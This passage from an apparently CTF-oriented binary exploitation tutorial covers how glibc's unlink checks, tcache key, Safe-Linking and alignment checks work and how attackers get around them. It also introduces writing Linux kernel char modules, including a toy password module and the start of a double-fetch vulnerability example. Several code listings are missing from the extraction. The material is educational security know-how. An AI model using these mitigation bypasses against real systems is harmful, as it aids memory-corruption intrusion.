protected memory, the binary will crash.

More modern libc versions have a different version of the unlink macro, which looks like
this: 199/240
4/10/24, 12:28 PM Binary Exploitation

FD = P->fd;
BK = P->bk;

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))

malloc_printerr (check_action, "corrupted double-linked list", P, AV)
else {
FD->bk = BK;
BK->fd = FD;

Here unlink() check the bk pointer of the forward chunk and the fd pointer of the
backward chunk and makes sure they point to P , which is unlikely if you fake a chunk.
This quite significantly restricts where we can write using unlink. 200/240
4/10/24, 12:28 PM Binary Exploitation

Tcache Keys
A primitive double-free protection

Starting from glibc 2.29, the tcache was hardened by the addition of a second field in
the tcache_entry struct, the key :

typedef struct tcache_entry

struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;

It's a pointer to a tcache_perthread_struct . In the tcache_put() function, we can

see what key is set to:

/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;

When a chunk is freed and tcache_put() is called on it, the key field is set to the
location of the tcache_perthread_struct . Why is this relevant? Let's check the tcache
security checks in _int_free() : 201/240
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size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);

/* This test succeeds on double free. However, we don't 100%

trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */

if (tcache->counts[tc_idx] < mp_.tcache_count)

tcache_put (p, tc_idx);

The chunk being freed is variable e . We can see here that before tcache_put() is
called on it, there is a check being done:

if (__glibc_unlikely (e->key == tcache))

The check determines whether the key field of the chunk e is set to the address of
the tcache_perthread_struct already. Remember that this happens when it is put
into the tcache with tcache_put() ! If the pointer is already there, there is a very 202/240
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high chance that it's because the chunk has already been freed, in which case it's a

It's not a 100% guaranteed double-free though - as the comment above it says:

This test succeeds on double free. However, we don't 100% trust it (it also matches
random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting.

There is a 1/2^<size_t> chance that the key being tcache_perthread_struct

already is a coincidence. To verify, it simply iterates through the tcache bin and
compares the chunks to the one being freed:

tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */

Iterates through each entry, calls it tmp and compares it to e . If equal, it detected a

You can think of the key as an effectively random value (due to ASLR) that gets checked
against, and if it's the correct value then something is suspicious.

So, what can we do against this? Well, this protection doesn't affect us that much - it
stops a simple double-free, but if we have any kind of UAF primitive we can easily
overwrite e->key . Even with a single byte, we still have a 255/256 chance of
overwriting it to something that doesn't match key . Creating fake tcache chunks
doesn't matter either, as even in the latest glibc version there is no key check in
tcache_get() , meaning tcache poisoning is still doable.

In fact, the key can even be helpful for us - the fd pointer of the tcache chunk is
mangled, so a UAF does not guarantee a heap leak. The key field is not mangled, so if 203/240
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we can leak the location of tcache_perthread_struct instead, this gives us a heap

leak as it is always located at heap_base + 0x10 .

In glibc 2.34, the key field was updated from a tcache_perthread_struct * to a

uintptr_t . Instead of tcache_put() setting key to the location of the
tcache_perthread_struct , it sets it to a new variable called tcache_key :

static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)

tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);

tcache->entries[tc_idx] = e;

Note the Safe-Linking PROTECT_PTR as well!

What is tcache_key ? It's defined here and set directly below, in the
tcache_key_initialise() function:

static void tcache_key_initialize (void)

if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)
!= sizeof (tcache_key))
tcache_key = random_bits ();
#if __WORDSIZE == 64
tcache_key = (tcache_key << 32) | random_bits ();

It attempts to call __getrandom() , which is defined as a stub here and for Linux here;
it just uses a syscall to read n random bytes. If that fails for some reason, it calls the 204/240
4/10/24, 12:28 PM Binary Exploitation

random_bits() function instead, which generates a pseudo-random number seeded

by the time. Long story short: tcache_key is random. The check in _int_free() still
exists, and the operation is the same, just it's completely random rather than based on
ASLR. As the comment above it says

The value of tcache_key does not really have to be a cryptographically secure

random number. It only needs to be arbitrary enough so that it does not collide
with values present in applications. [...]

This isn't a huge change - it's still only straight double-frees that are affected. We can
no longer leak the heap via the key , however. 205/240
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Safe Linking
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect
the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd
pointer of free chunks in these bins with a mangling operation, making it more difficult
to overwrite it with an arbitrary value.

Every single fd pointer is protected by the PROTECT_PTR macro, which is undone by

the REVEAL_PTR macro:

#define PROTECT_PTR(pos, ptr) \

((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

Here, pos is the location of the current chunk and ptr the location of the chunk we
are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are
using ASLR to protect! The >>12 gets rid of the predictable last 12 bits of ASLR,
keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are
pretty predictable):

It's a very rudimentary protection - we use the current location and the location we
point to in order to mangle it. From a programming standpoint, it has virtually no 206/240
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overhead or performance impact. We can see that PROTECT_PTR has been

implemented in tcache_put() and two locations in _int_free() (for fastbins) here
and here. You can find REVEAL_PTR used as well.

So, what does this mean to an attacker?

Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in
PROTECT_PTR , and we can easily recreate it to fake our own mangled pointer.

It might be tempting to say that a partial overwrite is still possible, but there is a new
security check that comes along with this Safe-Linking mechanism, the alignment
check. This check ensures that chunks are 16-bit aligned and is only relevant to singly-
linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned in malloc.c will
bring up plenty of different locations. The most important ones for us as attackers is
probably the one in tcache_get() and the ones in _int_malloc() .


When trying to get a chunk e out of the tcache, alignment is checked.

if (__glibc_unlikely (!aligned_OK (e)))

malloc_printerr ("malloc(): unaligned tcache chunk detected");


There are three checks here. First on REMOVE_FB , the macro for removing a chunk
from a fastbin:

if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \

malloc_printerr ("malloc(): unaligned fastbin chunk detected");

Once on the first chunk returned from the fastbin:

if (__glibc_unlikely (misaligned_chunk (victim)))

malloc_printerr ("malloc(): unaligned fastbin chunk detected 2"); 207/240
4/10/24, 12:28 PM Binary Exploitation

And lastly on every fastbin chunk during the movement over to the respective
tcache bin:

if (__glibc_unlikely (misaligned_chunk (tc_victim)))

malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");


_int_free() checks the alignment if the tcache_entry key is already set to

the value it's meant to be and it has to do a whole double-free iteration check:

if (__glibc_unlikely (e->key == tcache))

tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->ne
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcac
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */


When all the fastbins are consolidated into the unsorted bin, they are checked for

if (__glibc_unlikely (misaligned_chunk (p)))

malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");

Others 208/240
4/10/24, 12:28 PM Binary Exploitation

Not super important functions for attackers, but fastbin chunks are checked for
alignment in int_mallinfo() , __malloc_info() , do_check_malloc_state() ,
tcache_thread_shutdown() .

if (__glibc_unlikely (misaligned_chunk (p)))

malloc_printerr ("<funcname>(): "
"unaligned fastbin chunk detected")

if (__glibc_unlikely (!aligned_OK (e)))

malloc_printerr ("tcache_thread_shutdown(): "
"unaligned tcache chunk detected");

You may notice some of them use !aligned_OK while others use
misaligned_chunk() .

#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)

#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \

The macros are defined side-by-side, but really aligned_OK is for addresses while
misaligned_chunk is for chunks.

MALLOC_ALIGN_MASK is defined as such:


MALLOC_ALIGNMENT is defined for i386 as 16 . In binary that's 10000 , so

MALLOC_ALIGN_MASK is 1111 , so the final byte is checked. This results in 16-bit
alignment, as expected.

This alignment check means you would have to guess 16 bits of entropy, leading to a
1/16 chance if you attempt to brute-force the last 16 bits to be 209/240
4/10/24, 12:28 PM Binary Exploitation

Heavily beta 210/240
4/10/24, 12:28 PM Binary Exploitation

The kernel is the program at the heart of the Operating System. It is responsible for
controlling every aspect of the computer, from the nature of syscalls to the integration
between software and hardware. As such, exploiting the kernel can lead to some
incredibly dangerous bugs.

In the context of CTFs, Linux kernel exploitation often involves the exploitation of
kernel modules. This is an integral feature of Linux that allows users to extend the
kernel with their own code, adding additional features.

You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow
here, and I recommend it highly.

Kernel Modules

Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most
kernel modules are compiled for a specific version kernel version (which can be checked
with uname -r , my Xenial Xerus is 4.15.0-128-generic ). We can load and unload
these modules using the insmod and rmmod commands respectively. Kernel modules
are often loaded into /dev/* or /proc/ . There are 3 main module types: Char, Block
and Network.

Char Modules

Char Modules are deceptively simple. Essentially, you can access them as a stream of
bytes - just like a file - using syscalls such as open . In this way, they're virtually almost
dynamic files (at a super basic level), as the values read and written can be changed.

Examples of Char modules include /dev/random .

I'll be using the term module and device interchangeably. As far as I can tell, they are the
same, but please let me know if I'm wrong! 211/240
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Writing a Char Module

The Code
Writing a Char Module is suprisingly simple. First, we specify what happens on init
(loading of the module) and exit (unloading of the module). We need some special
headers for this.

#include <linux/init.h>
#include <linux/module.h>


static int intro_init(void) {

printk(KERN_ALERT "Custom Module Started!\n");
return 0;

static void intro_exit(void) {

printk(KERN_ALERT "Custom Module Stopped :(\n");


It looks simple, because it is simple. For now, anyway.

First we set the license, because otherwise we get a warning, and I hate warnings. Next
we tell the module what to do on load ( intro_init() ) and unload ( intro_exit() ).
Note we put parameters as void , this is because kernel modules are very picky about
requiring parameters (even if just void).

We then register the purposes of the functions using module_init() and

module_exit() .

Note that we use printk rather than printf . GLIBC doesn't exist in kernel mode,
and instead we use C's in-built kernel functionality. KERN_ALERT is specifies the type of
message sent, and there are many more types. 212/240
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Compiling a Kernel Object can seem a little more complex as we use a Makefile , but
it's surprisingly simple:

obj-m += intro.o

make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

We use make to compile the module. The files produced are defined at the top as
obj-m . Note that compilation is unique per kernel, which is why the compiling process
uses your unique kernel build section.

Using the Kernel Module

Now we've got a ko file compiled, we can add it to the list of active modules:

$ sudo insmod test.ko

If it's successful, there will be no response. But where did it print to?

Remember, the kernel program has no concept of userspace; it does not know you ran
it, nor does it bother communicating with userspace. Instead, this code runs in the
kernel, and we can check the output using sudo dmesg .

$ sudo dmesg | tail -n 1

[ 3645.657331] Custom Module Started!

Here we grab the last line using tail - as you can see, our printk is called!

Now let's unload the module: 213/240
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$ sudo rmmod test

$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(

And there our intro_exit is called.

You can view currently loaded modules using the lsmod command 214/240
4/10/24, 12:28 PM Binary Exploitation

An Interactive Char Driver

Creating an interactive char driver is surprisingly simple, but there are a few traps along
the way.

Exposing it to the File System

This is by far the hardest part to understand, but honestly a full understanding isn't
really necessary. The new intro_init function looks like this:

A major number is essentially the unique identifier to the kernel module. You can
specify it using the first parameter of register_chrdev , but if you pass 0 it is
automatically assigned an unused major number.

We then have to register the class and the device. In complete honesty, I don't quite
understand what they do, but this code exposes the module to /dev/intro .

Note that on an error it calls class_destroy and unregister_chrdev :

Cleaning it Up
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available: 215/240
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Controlling I/O
In intro_init , the first line may have been confusing:

The third parameter fops is where all the magic happens, allowing us to create
handlers for operations such as read and write . A really simple one would look
something like: 216/240
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The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line
up to the 2nd and 3rd parameters for the read() function itself:

We then use the function copy_to_user to write QWERTY to the buffer passed in as a

Full Code 217/240
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Testing The Module

Create a really basic exploit.c :

If the module is successfully loaded, the read() call should read QWERTY into
buffer :

Success! 218/240
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Loading... 219/240
4/10/24, 12:28 PM Binary Exploitation

A Basic Kernel Interaction Challenge

The Module
We're going to create a really basic authentication module that allows you to read the
flag if you input the correct password. Here is the relevant code:

If we attempt to read() from the device, it checks the authenticated flag to see if it
can return us the flag. If not, it sends back FAIL: Not Authenticated! .

In order to update authenticated , we have to write() to the kernel module. What

we attempt to write it compared to p4ssw0rd . If it's not equal, nothing happens. If it
is, authenticated is updated and the next time we read() it'll return the flag!


Let's first try and interact with the kernel by reading from it.

Make sure you sudo chmod 666 /dev/authentication !

We'll start by opening the device and reading from it. 220/240
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Note that in the module source code, the length of read() is completely disregarded, so
we could make it any number at all! Try switching it to 1 and you'll see.

After compiling, we get that we are not authenticated:

Epic! Let's write the correct password to the device then try again. It's really important
to send the null byte here! That's because copy_from_user() does not automatically
add it, so the strcmp will fail otherwise! 221/240
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It works!

Amazing! Now for something really important:

The state is preserved between connections! Because the kernel module remains on,
you will be authenticated until the module is reloaded (either via rmmod then insmod ,
or a system restart).

Final Code 222/240
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Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead.
Then write a program to interact with it and perform the same operations. ZIP file
including both below, but no cheating! This is really good practise. 223/240
4/10/24, 12:28 PM Binary Exploitation

The most simple of vulnerabilities

A double-fetch vulnerability is when data is accessed from userspace multiple times.

Because userspace programs will commonly pass parameters in to the kernel as
pointers, the data can be modified at any time. If it is modified at the exact right time,
an attacker could compromise the execution of the kernel.

Let's see it in action.

A Vulnerable Kernel Module

Let's say we wish to replace the authentication of the kernel with our own module to
handle it. The password to all users on this system is p4ssw0rd . However, for security
purposes, we do not wish to allow anybody to log in as root (yes, it's a very specific
case, but it helps to make it clear!). 224/240
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Other 230/240
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